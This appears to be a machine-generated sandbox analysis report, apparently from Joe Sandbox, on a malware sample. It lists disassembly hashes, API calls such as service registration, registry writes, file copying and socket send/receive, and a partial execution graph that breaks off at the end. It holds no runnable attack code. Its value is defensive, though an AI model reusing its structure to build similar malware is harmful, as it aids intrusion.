                                                                                            • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                            • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                            • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                            APIs
                                                                                              • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73AF0000,00481A2F), ref: 0047D0E2
                                                                                              • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                              • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                            Strings
                                                                                            • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                            • API String ID: 1717587489-3199836293
                                                                                            • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                            • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                            • GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: P6U
                                                                                            • API String ID: 2123368496-31507372
                                                                                            • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                            • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                            • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                            • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                            • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.6%
                                                                                            Dynamic/Decrypted Code Coverage:84.8%
                                                                                            Signature Coverage:10.7%
                                                                                            Total number of Nodes:955
                                                                                            Total number of Limit Nodes:36
                                                                                            execution_graph 61408 402a20 GetVersion 61433 403b64 HeapCreate 61408->61433 61410 402a7f 61411 402a84 61410->61411 61412 402a8c 61410->61412 61511 402b3b 8 API calls 61411->61511 61445 403844 61412->61445 61416 402a94 GetCommandLineA 61459 403712 61416->61459 61420 402aae 61491 40340c 61420->61491 61422 402ab3 61423 402ab8 GetStartupInfoA 61422->61423 61504 4033b4 61423->61504 61425 402aca GetModuleHandleA 61508 401f06 61425->61508 61434 403b84 61433->61434 61435 403bba 61433->61435 61512 403a1c 19 API calls 61434->61512 61435->61410 61437 403b89 61438 403b93 61437->61438 61440 403ba0 61437->61440 61513 403f3b HeapAlloc 61438->61513 61441 403bbd 61440->61441 61514 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61440->61514 61441->61410 61442 403b9d 61442->61441 61444 403bae HeapDestroy 61442->61444 61444->61435 61515 402b5f 61445->61515 61448 403863 GetStartupInfoA 61451 4038af 61448->61451 61452 403974 61448->61452 61451->61452 61455 403920 61451->61455 61456 402b5f 12 API calls 61451->61456 61453 4039db SetHandleCount 61452->61453 61454 40399b GetStdHandle 61452->61454 61453->61416 61454->61452 61457 4039a9 GetFileType 61454->61457 61455->61452 61458 403942 GetFileType 61455->61458 61456->61451 61457->61452 61458->61455 61460 403760 61459->61460 61461 40372d GetEnvironmentStringsW 61459->61461 61463 403735 61460->61463 61464 403751 61460->61464 61462 403741 GetEnvironmentStrings 61461->61462 61461->61463 61462->61464 61465 402aa4 61462->61465 61466 40376d GetEnvironmentStringsW 61463->61466 61469 403779 61463->61469 61464->61465 61467 4037f3 GetEnvironmentStrings 61464->61467 61468 4037ff 61464->61468 61482 4034c5 61465->61482 61466->61465 61466->61469 61467->61465 61467->61468 61473 402b5f 12 API calls 61468->61473 61469->61469 61470 40378e WideCharToMultiByte 61469->61470 61471 4037ad 61470->61471 61472 4037df FreeEnvironmentStringsW 61470->61472 61474 402b5f 12 API calls 61471->61474 61472->61465 61480 40381a 61473->61480 61475 4037b3 61474->61475 61475->61472 61476 4037bc WideCharToMultiByte 61475->61476 61478 4037d6 61476->61478 61479 4037cd 61476->61479 61477 403830 FreeEnvironmentStringsA 61477->61465 61478->61472 61524 402c11 61479->61524 61480->61477 61483 4034d7 61482->61483 61484 4034dc GetModuleFileNameA 61482->61484 61537 405d24 19 API calls 61483->61537 61486 4034ff 61484->61486 61487 402b5f 12 API calls 61486->61487 61488 403520 61487->61488 61490 403530 61488->61490 61538 402b16 7 API calls 61488->61538 61490->61420 61492 403419 61491->61492 61494 40341e 61491->61494 61539 405d24 19 API calls 61492->61539 61495 402b5f 12 API calls 61494->61495 61496 40344b 61495->61496 61503 40345f 61496->61503 61540 402b16 7 API calls 61496->61540 61497 4034a2 61499 402c11 7 API calls 61497->61499 61500 4034ae 61499->61500 61500->61422 61501 402b5f 12 API calls 61501->61503 61503->61497 61503->61501 61541 402b16 7 API calls 61503->61541 61505 4033bd 61504->61505 61507 4033c2 61504->61507 61542 405d24 19 API calls 61505->61542 61507->61425 61509 4020ab GetModuleHandleA 61508->61509 61512->61437 61513->61442 61514->61442 61519 402b71 61515->61519 61518 402b16 7 API calls 61518->61448 61520 402b6e 61519->61520 61522 402b78 61519->61522 61520->61448 61520->61518 61522->61520 61523 402b9d 12 API calls 61522->61523 61523->61522 61525 402c39 61524->61525 61526 402c1d 61524->61526 61525->61478 61527 402c27 61526->61527 61528 402c3d 61526->61528 61530 402c69 HeapFree 61527->61530 61531 402c33 61527->61531 61529 402c68 61528->61529 61533 402c57 61528->61533 61529->61530 61530->61525 61535 403fae VirtualFree VirtualFree HeapFree 61531->61535 61536 404a3f VirtualFree HeapFree VirtualFree 61533->61536 61535->61525 61536->61525 61537->61484 61538->61490 61539->61494 61540->61503 61541->61503 61542->61507 60624 401842 VirtualAlloc 60625 40de72 60624->60625 60626 401742 60627 40d57b RegQueryValueExA 60626->60627 60628 401c85 60629 40d823 RegCreateKeyExA 60628->60629 61543 2b95e5e RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61613 2b942c7 61543->61613 61545 2b95ecb GetTickCount 61546 2b959fa 59 API calls 61545->61546 61547 2b95ee8 GetVersionExA 61546->61547 61548 2b95f29 __cftoa_l 61547->61548 61549 2ba1fbc _malloc 59 API calls 61548->61549 61550 2b95f36 61549->61550 61551 2ba1fbc _malloc 59 API calls 61550->61551 61552 2b95f46 61551->61552 61553 2ba1fbc _malloc 59 API calls 61552->61553 61554 2b95f51 61553->61554 61555 2ba1fbc _malloc 59 API calls 61554->61555 61556 2b95f5c 61555->61556 61557 2ba1fbc _malloc 59 API calls 61556->61557 61558 2b95f67 61557->61558 61559 2ba1fbc _malloc 59 API calls 61558->61559 61560 2b95f72 61559->61560 61561 2ba1fbc _malloc 59 API calls 61560->61561 61562 2b95f7d 61561->61562 61563 2ba1fbc _malloc 59 API calls 61562->61563 61564 2b95f89 6 API calls 61563->61564 61565 2b95fd6 __cftoa_l 61564->61565 61566 2b95fef RtlEnterCriticalSection RtlLeaveCriticalSection 61565->61566 61567 2ba1fbc _malloc 59 API calls 61566->61567 61568 2b9602b 61567->61568 61569 2ba1fbc _malloc 59 API calls 61568->61569 61570 2b96039 61569->61570 61571 2ba1fbc _malloc 59 API calls 61570->61571 61572 2b96040 61571->61572 61573 2ba1fbc _malloc 59 API calls 61572->61573 61574 2b96061 QueryPerformanceCounter Sleep 61573->61574 61575 2ba1fbc _malloc 59 API calls 61574->61575 61576 2b96087 61575->61576 61577 2ba1fbc _malloc 59 API calls 61576->61577 61605 2b96097 __cftoa_l 61577->61605 61578 2b96104 Sleep 61579 2b9610a RtlEnterCriticalSection RtlLeaveCriticalSection 61578->61579 61579->61605 61580 2b9649e RtlEnterCriticalSection RtlLeaveCriticalSection 61581 2ba134c 66 API calls 61580->61581 61581->61605 61582 2ba134c 66 API calls 61582->61605 61583 2ba1fbc _malloc 59 API calls 61584 2b96540 RtlEnterCriticalSection RtlLeaveCriticalSection 61583->61584 61584->61605 61585 2b967f7 RtlEnterCriticalSection RtlLeaveCriticalSection 61585->61605 61586 2b95c11 59 API calls 61586->61605 61587 2ba1428 _sprintf 79 API calls 61587->61605 61588 2b91ba7 210 API calls 61588->61605 61589 2b9695c RtlEnterCriticalSection 61590 2b96989 RtlLeaveCriticalSection 61589->61590 61589->61605 61591 2b93c67 72 API calls 61590->61591 61591->61605 61592 2ba1fbc _malloc 59 API calls 61592->61605 61593 2b93d7e 64 API calls 61593->61605 61594 2b9733f 89 API calls 61594->61605 61595 2ba1f84 _free 59 API calls 61595->61605 61596 2ba25f6 65 API calls _strtok 61596->61605 61597 2b99729 73 API calls 61597->61605 61598 2b98007 88 API calls 61598->61605 61599 2ba27c5 _Allocate 60 API calls 61599->61605 61600 2b973ee 71 API calls 61600->61605 61601 2ba1860 _swscanf 59 API calls 61601->61605 61602 2b933b2 86 API calls 61602->61605 61603 2b9873b 212 API calls 61603->61605 61604 2b99853 60 API calls 61604->61605 61605->61578 61605->61579 61605->61580 61605->61582 61605->61583 61605->61585 61605->61586 61605->61587 61605->61588 61605->61589 61605->61590 61605->61592 61605->61593 61605->61594 61605->61595 61605->61596 61605->61597 61605->61598 61605->61599 61605->61600 61605->61601 61605->61602 61605->61603 61605->61604 61605->61605 61606 2b95119 103 API calls 61605->61606 61607 2b9c11b 73 API calls 61605->61607 61608 2b99c13 210 API calls 61605->61608 61609 2b96774 Sleep 61605->61609 61611 2b9676f shared_ptr 61605->61611 61606->61605 61607->61605 61608->61605 61610 2ba0900 GetProcessHeap HeapFree 61609->61610 61610->61611 61611->61605 61611->61609 61612 2b94100 GetProcessHeap HeapFree 61611->61612 61612->61611 60631 402188 LoadLibraryExA 60632 401f20 60631->60632 60632->60631 60633 40dab3 60632->60633 60634 2bcca75 CloseHandle 60635 2bd4ca4 60634->60635 61614 401769 61615 40176e 61614->61615 61616 40dd78 CopyFileA 61615->61616 61617 40dee9 61618 40de86 61617->61618 61619 40df4c StartServiceCtrlDispatcherA 61617->61619 61618->61619 61620 40e028 lstrcmpiW 61619->61620 60636 2b963f5 60650 2b960f0 shared_ptr __cftoa_l 60636->60650 60637 2b96104 Sleep 60638 2b9610a RtlEnterCriticalSection RtlLeaveCriticalSection 60637->60638 60638->60636 60639 2b9649e RtlEnterCriticalSection RtlLeaveCriticalSection 60734 2ba134c 60639->60734 60641 2ba134c 66 API calls 60641->60650 60644 2b967f7 RtlEnterCriticalSection RtlLeaveCriticalSection 60644->60650 60648 2b9695c RtlEnterCriticalSection 60649 2b96989 RtlLeaveCriticalSection 60648->60649 60648->60650 60801 2b93c67 60649->60801 60650->60637 60650->60638 60650->60639 60650->60641 60650->60644 60650->60648 60650->60649 60652 2ba1fbc _malloc 59 API calls 60650->60652 60656 2ba25f6 65 API calls _strtok 60650->60656 60662 2b99729 73 API calls 60650->60662 60668 2b9676f shared_ptr 60650->60668 60669 2b96774 Sleep 60650->60669 60672 2b95119 60650->60672 60701 2b99c13 60650->60701 60711 2b95c11 60650->60711 60715 2b9733f 60650->60715 60721 2b9c11b 60650->60721 60726 2b973ee 60650->60726 60744 2ba1fbc 60650->60744 60761 2ba1860 59 API calls _vscan_fn 60650->60761 60762 2ba1f84 60650->60762 60768 2ba27c5 60650->60768 60776 2b9873b 212 API calls __EH_prolog 60650->60776 60777 2b99853 60650->60777 60782 2b94100 GetProcessHeap HeapFree 60650->60782 60783 2ba1428 60650->60783 60792 2b91ba7 60650->60792 60808 2b93d7e 60650->60808 60815 2b933b2 86 API calls 60650->60815 60816 2b98007 88 API calls __EH_prolog 60650->60816 60652->60650 60656->60650 60662->60650 60668->60669 60781 2ba0900 GetProcessHeap HeapFree 60669->60781 60673 2b95123 __EH_prolog 60672->60673 60817 2b9fb20 60673->60817 60676 2b93c67 72 API calls 60677 2b9514a 60676->60677 60678 2b93d7e 64 API calls 60677->60678 60679 2b95158 60678->60679 60680 2b9733f 89 API calls 60679->60680 60681 2b9516c 60680->60681 60684 2b95322 shared_ptr 60681->60684 60821 2b99729 60681->60821 60684->60650 60685 2b951c4 60687 2b99729 73 API calls 60685->60687 60686 2b951f6 60688 2b99729 73 API calls 60686->60688 60690 2b951d4 60687->60690 60689 2b95207 60688->60689 60689->60684 60691 2b99729 73 API calls 60689->60691 60690->60684 60693 2b99729 73 API calls 60690->60693 60692 2b9524a 60691->60692 60692->60684 60695 2b99729 73 API calls 60692->60695 60694 2b952b4 60693->60694 60694->60684 60696 2b99729 73 API calls 60694->60696 60695->60690 60697 2b952da 60696->60697 60697->60684 60698 2b99729 73 API calls 60697->60698 60699 2b95304 60698->60699 60826 2b9bedd 60699->60826 60702 2b99c1d __EH_prolog 60701->60702 60918 2b9c0f2 72 API calls 60702->60918 60704 2b99c3e shared_ptr 60919 2ba1100 60704->60919 60706 2b99c55 60707 2b99c6b 60706->60707 60925 2b93fb0 68 API calls Mailbox 60706->60925 60707->60650 60709 2b99c61 60926 2b9968f 60 API calls 4 library calls 60709->60926 60713 2b95c17 60711->60713 60712 2ba1fbc _malloc 59 API calls 60712->60713 60713->60712 60714 2b95c96 60713->60714 60716 2b97378 60715->60716 60717 2b97357 60715->60717 60720 2b9739d 60716->60720 61202 2b92ac7 60716->61202 61199 2b98601 60717->61199 60720->60650 60722 2b9fb20 Mailbox 68 API calls 60721->60722 60724 2b9c131 60722->60724 60723 2b9c21f 60723->60650 60724->60723 60725 2b92db5 73 API calls 60724->60725 60725->60724 60727 2b97409 WSASetLastError shutdown 60726->60727 60728 2b973f9 60726->60728 60730 2b9950d 69 API calls 60727->60730 60729 2b9fb20 Mailbox 68 API calls 60728->60729 60731 2b973fe 60729->60731 60732 2b97426 60730->60732 60731->60650 60732->60731 60733 2b9fb20 Mailbox 68 API calls 60732->60733 60733->60731 60735 2ba1358 60734->60735 60736 2ba137b 60734->60736 60735->60736 60737 2ba135e 60735->60737 61257 2ba1393 66 API calls 5 library calls 60736->61257 61255 2ba4acb 59 API calls __getptd_noexit 60737->61255 60740 2ba138e 60740->60650 60741 2ba1363 61256 2ba3b65 9 API calls _vscan_fn 60741->61256 60743 2ba136e 60743->60650 60745 2ba2037 60744->60745 60753 2ba1fc8 60744->60753 61264 2ba6e73 RtlDecodePointer 60745->61264 60747 2ba203d 61265 2ba4acb 59 API calls __getptd_noexit 60747->61265 60750 2ba1ffb RtlAllocateHeap 60750->60753 60760 2b96540 RtlEnterCriticalSection RtlLeaveCriticalSection 60750->60760 60752 2ba2023 61262 2ba4acb 59 API calls __getptd_noexit 60752->61262 60753->60750 60753->60752 60757 2ba2021 60753->60757 60758 2ba1fd3 60753->60758 61261 2ba6e73 RtlDecodePointer 60753->61261 61263 2ba4acb 59 API calls __getptd_noexit 60757->61263 60758->60753 61258 2ba7291 59 API calls 2 library calls 60758->61258 61259 2ba72ee 59 API calls 8 library calls 60758->61259 61260 2ba6eda GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 60758->61260 60760->60650 60761->60650 60763 2ba1f8d HeapFree 60762->60763 60767 2ba1fb6 _free 60762->60767 60764 2ba1fa2 60763->60764 60763->60767 61266 2ba4acb 59 API calls __getptd_noexit 60764->61266 60766 2ba1fa8 GetLastError 60766->60767 60767->60650 60770 2ba27cd 60768->60770 60769 2ba1fbc _malloc 59 API calls 60769->60770 60770->60769 60771 2ba27e7 60770->60771 60773 2ba27eb std::exception::exception 60770->60773 61267 2ba6e73 RtlDecodePointer 60770->61267 60771->60650 61268 2ba31ca RaiseException 60773->61268 60775 2ba2815 60776->60650 60778 2b9985d __EH_prolog 60777->60778 61269 2b9d004 60778->61269 60780 2b9987b shared_ptr 60780->60650 60781->60650 60782->60650 60784 2ba1459 60783->60784 60785 2ba1444 60783->60785 60784->60785 60788 2ba1460 60784->60788 61273 2ba4acb 59 API calls __getptd_noexit 60785->61273 60787 2ba1449 61274 2ba3b65 9 API calls _vscan_fn 60787->61274 60790 2ba1454 60788->60790 61275 2ba4b71 79 API calls 4 library calls 60788->61275 60790->60650 61276 2bb2a10 60792->61276 60794 2b91bb1 RtlEnterCriticalSection 60795 2b91be9 RtlLeaveCriticalSection 60794->60795 60797 2b91bd1 60794->60797 61277 2b9d334 60795->61277 60797->60795 60798 2b91c55 RtlLeaveCriticalSection 60797->60798 60798->60650 60799 2b91c22 60799->60798 60802 2b9fb20 Mailbox 68 API calls 60801->60802 60803 2b93c7e 60802->60803 61340 2b93ca2 60803->61340 60809 2b93d99 htons 60808->60809 60810 2b93dcb htons 60808->60810 61369 2b93bd3 60 API calls 2 library calls 60809->61369 61370 2b93c16 60 API calls 2 library calls 60810->61370 60813 2b93db7 htonl htonl 60814 2b93ded 60813->60814 60814->60650 60815->60650 60816->60650 60818 2b9fb49 60817->60818 60819 2b9513d 60817->60819 60831 2ba23b4 60818->60831 60819->60676 60822 2b9fb20 Mailbox 68 API calls 60821->60822 60824 2b99743 60822->60824 60823 2b9519d 60823->60684 60823->60685 60823->60686 60824->60823 60875 2b92db5 60824->60875 60827 2b9fb20 Mailbox 68 API calls 60826->60827 60828 2b9bef7 60827->60828 60829 2b9c006 60828->60829 60902 2b92b95 60828->60902 60829->60684 60834 2ba22b8 60831->60834 60833 2ba23bf 60833->60819 60835 2ba22c4 __ioinit 60834->60835 60842 2ba7150 60835->60842 60841 2ba22eb __ioinit 60841->60833 60859 2ba74ab 60842->60859 60844 2ba22cd 60845 2ba22fc RtlDecodePointer RtlDecodePointer 60844->60845 60846 2ba22d9 60845->60846 60847 2ba2329 60845->60847 60856 2ba22f6 60846->60856 60847->60846 60868 2ba7d1d 60 API calls 2 library calls 60847->60868 60849 2ba238c RtlEncodePointer RtlEncodePointer 60849->60846 60850 2ba233b 60850->60849 60851 2ba2360 60850->60851 60869 2ba76b9 62 API calls 2 library calls 60850->60869 60851->60846 60854 2ba237a RtlEncodePointer 60851->60854 60870 2ba76b9 62 API calls 2 library calls 60851->60870 60854->60849 60855 2ba2374 60855->60846 60855->60854 60871 2ba7159 60856->60871 60860 2ba74cf RtlEnterCriticalSection 60859->60860 60861 2ba74bc 60859->60861 60860->60844 60866 2ba7533 59 API calls 9 library calls 60861->60866 60863 2ba74c2 60863->60860 60867 2ba6ffd 59 API calls 3 library calls 60863->60867 60866->60863 60868->60850 60869->60851 60870->60855 60874 2ba7615 RtlLeaveCriticalSection 60871->60874 60873 2ba22fb 60873->60841 60874->60873 60876 2b92dca 60875->60876 60877 2b92de4 60875->60877 60879 2b9fb20 Mailbox 68 API calls 60876->60879 60878 2b92dfc 60877->60878 60880 2b92def 60877->60880 60889 2b92d39 WSASetLastError WSASend 60878->60889 60882 2b92dcf 60879->60882 60883 2b9fb20 Mailbox 68 API calls 60880->60883 60882->60824 60883->60882 60884 2b92e0c 60884->60882 60885 2b92e54 WSASetLastError select 60884->60885 60887 2b9fb20 68 API calls Mailbox 60884->60887 60888 2b92d39 71 API calls 60884->60888 60899 2b9950d 60885->60899 60887->60884 60888->60884 60890 2b9950d 69 API calls 60889->60890 60891 2b92d6e 60890->60891 60892 2b92d82 60891->60892 60893 2b92d75 60891->60893 60895 2b9fb20 Mailbox 68 API calls 60892->60895 60898 2b92d7a 60892->60898 60894 2b9fb20 Mailbox 68 API calls 60893->60894 60894->60898 60895->60898 60896 2b92d9c 60896->60884 60897 2b9fb20 Mailbox 68 API calls 60897->60896 60898->60896 60898->60897 60900 2b9fb20 Mailbox 68 API calls 60899->60900 60901 2b99519 WSAGetLastError 60900->60901 60901->60884 60903 2b92bb1 60902->60903 60904 2b92bc7 60902->60904 60905 2b9fb20 Mailbox 68 API calls 60903->60905 60906 2b92bdf 60904->60906 60909 2b92bd2 60904->60909 60908 2b92bb6 60905->60908 60907 2b92be2 WSASetLastError WSARecv 60906->60907 60906->60908 60912 2b92d22 60906->60912 60914 2b92cbc WSASetLastError select 60906->60914 60916 2b9fb20 68 API calls Mailbox 60906->60916 60910 2b9950d 69 API calls 60907->60910 60908->60828 60911 2b9fb20 Mailbox 68 API calls 60909->60911 60910->60906 60911->60908 60917 2b91996 68 API calls __cinit 60912->60917 60915 2b9950d 69 API calls 60914->60915 60915->60906 60916->60906 60917->60908 60918->60704 60927 2ba23c9 60919->60927 60922 2ba1124 60922->60706 60923 2ba114d ResumeThread 60923->60706 60924 2ba1146 CloseHandle 60924->60923 60925->60709 60928 2ba23eb 60927->60928 60929 2ba23d7 60927->60929 60946 2ba762a 60928->60946 60967 2ba4acb 59 API calls __getptd_noexit 60929->60967 60932 2ba23dc 60968 2ba3b65 9 API calls _vscan_fn 60932->60968 60935 2ba2449 60936 2ba1f84 _free 59 API calls 60935->60936 60938 2ba244f 60936->60938 60940 2ba111b 60938->60940 60969 2ba4aaa 59 API calls 3 library calls 60938->60969 60940->60922 60940->60923 60940->60924 60943 2ba240e CreateThread 60943->60940 60945 2ba2441 GetLastError 60943->60945 61008 2ba2529 60943->61008 60945->60935 60949 2ba7631 60946->60949 60948 2ba23f8 60948->60935 60952 2ba48ca 60948->60952 60949->60948 60951 2ba764f 60949->60951 60970 2bae9b8 60949->60970 60951->60948 60951->60949 60978 2ba80c5 Sleep 60951->60978 60981 2ba48e2 GetLastError 60952->60981 60954 2ba48d0 60956 2ba2405 60954->60956 60995 2ba6ffd 59 API calls 3 library calls 60954->60995 60957 2ba4951 60956->60957 60958 2ba495d __ioinit 60957->60958 60959 2ba74ab __lock 59 API calls 60958->60959 60960 2ba499a 60959->60960 61000 2ba49f2 60960->61000 60963 2ba74ab __lock 59 API calls 60964 2ba49bb ___addlocaleref 60963->60964 61003 2ba49fb 60964->61003 60966 2ba49e6 __ioinit 60966->60943 60967->60932 60968->60940 60969->60940 60971 2bae9c3 60970->60971 60976 2bae9de 60970->60976 60972 2bae9cf 60971->60972 60971->60976 60979 2ba4acb 59 API calls __getptd_noexit 60972->60979 60974 2bae9ee RtlAllocateHeap 60975 2bae9d4 60974->60975 60974->60976 60975->60949 60976->60974 60976->60975 60980 2ba6e73 RtlDecodePointer 60976->60980 60978->60951 60979->60975 60980->60976 60996 2ba7d8b 60981->60996 60983 2ba48f7 60984 2ba4945 SetLastError 60983->60984 60985 2ba762a __calloc_crt 56 API calls 60983->60985 60984->60954 60986 2ba490a 60985->60986 60986->60984 60999 2ba7daa TlsSetValue 60986->60999 60988 2ba491e 60989 2ba493c 60988->60989 60990 2ba4924 60988->60990 60991 2ba1f84 _free 56 API calls 60989->60991 60992 2ba4951 __initptd 56 API calls 60990->60992 60994 2ba4942 60991->60994 60993 2ba492c GetCurrentThreadId 60992->60993 60993->60984 60994->60984 60997 2ba7d9e 60996->60997 60998 2ba7da2 TlsGetValue 60996->60998 60997->60983 60998->60983 60999->60988 61006 2ba7615 RtlLeaveCriticalSection 61000->61006 61002 2ba49b4 61002->60963 61007 2ba7615 RtlLeaveCriticalSection 61003->61007 61005 2ba4a02 61005->60966 61006->61002 61007->61005 61009 2ba2532 __threadstartex@4 61008->61009 61010 2ba7d8b __threadstartex@4 TlsGetValue 61009->61010 61011 2ba2538 61010->61011 61012 2ba256b 61011->61012 61013 2ba253f __threadstartex@4 61011->61013 61041 2ba475f 59 API calls 6 library calls 61012->61041 61040 2ba7daa TlsSetValue 61013->61040 61015 2ba2586 ___crtIsPackagedApp 61018 2ba259a 61015->61018 61024 2ba24d1 61015->61024 61017 2ba254e 61019 2ba2561 GetCurrentThreadId 61017->61019 61020 2ba2554 GetLastError RtlExitUserThread 61017->61020 61030 2ba2462 61018->61030 61019->61015 61020->61019 61025 2ba24da LoadLibraryExW GetProcAddress 61024->61025 61026 2ba2513 RtlDecodePointer 61024->61026 61027 2ba24fc 61025->61027 61028 2ba24fd RtlEncodePointer 61025->61028 61029 2ba2523 61026->61029 61027->61018 61028->61026 61029->61018 61031 2ba246e __ioinit 61030->61031 61032 2ba48ca FindHandlerForForeignException 59 API calls 61031->61032 61033 2ba2473 61032->61033 61042 2ba1170 61033->61042 61036 2ba2483 61037 2ba7954 __XcptFilter 59 API calls 61036->61037 61038 2ba2494 61037->61038 61040->61017 61041->61015 61060 2ba0620 61042->61060 61045 2ba11b8 TlsSetValue 61046 2ba11c0 61045->61046 61082 2b9cdb8 61046->61082 61051 2ba24a3 61052 2ba48e2 __getptd_noexit 59 API calls 61051->61052 61053 2ba24ac 61052->61053 61054 2ba24c7 RtlExitUserThread 61053->61054 61055 2ba24bb 61053->61055 61056 2ba24c0 61053->61056 61197 2ba25a6 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61055->61197 61198 2ba4894 59 API calls 2 library calls 61056->61198 61059 2ba24c6 61059->61054 61074 2ba0684 61060->61074 61061 2ba0700 61062 2ba0716 61061->61062 61064 2ba0713 CloseHandle 61061->61064 61098 2ba31bb 61062->61098 61063 2ba06de ResetEvent 61070 2ba06e5 61063->61070 61064->61062 61066 2ba07ac WaitForSingleObject 61066->61074 61067 2ba069c 61067->61063 61068 2ba06b5 OpenEventA 61067->61068 61105 2ba0c20 GetCurrentProcessId 61067->61105 61072 2ba06cf 61068->61072 61073 2ba06d7 61068->61073 61069 2ba072e 61069->61045 61069->61046 61106 2ba0860 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61070->61106 61072->61073 61076 2ba06d4 CloseHandle 61072->61076 61073->61063 61073->61070 61074->61061 61074->61066 61074->61067 61077 2ba0780 CreateEventA 61074->61077 61080 2ba079e CloseHandle 61074->61080 61107 2ba0c20 GetCurrentProcessId 61074->61107 61075 2ba06b2 61075->61068 61076->61073 61077->61074 61080->61074 61081 2ba06fd 61081->61061 61083 2b9cdda 61082->61083 61109 2b94d86 61083->61109 61084 2b9cddd 61086 2ba0f40 61084->61086 61087 2ba0f79 TlsGetValue 61086->61087 61097 2ba0f71 Mailbox 61086->61097 61087->61097 61088 2ba1016 61088->61051 61089 2ba0fed 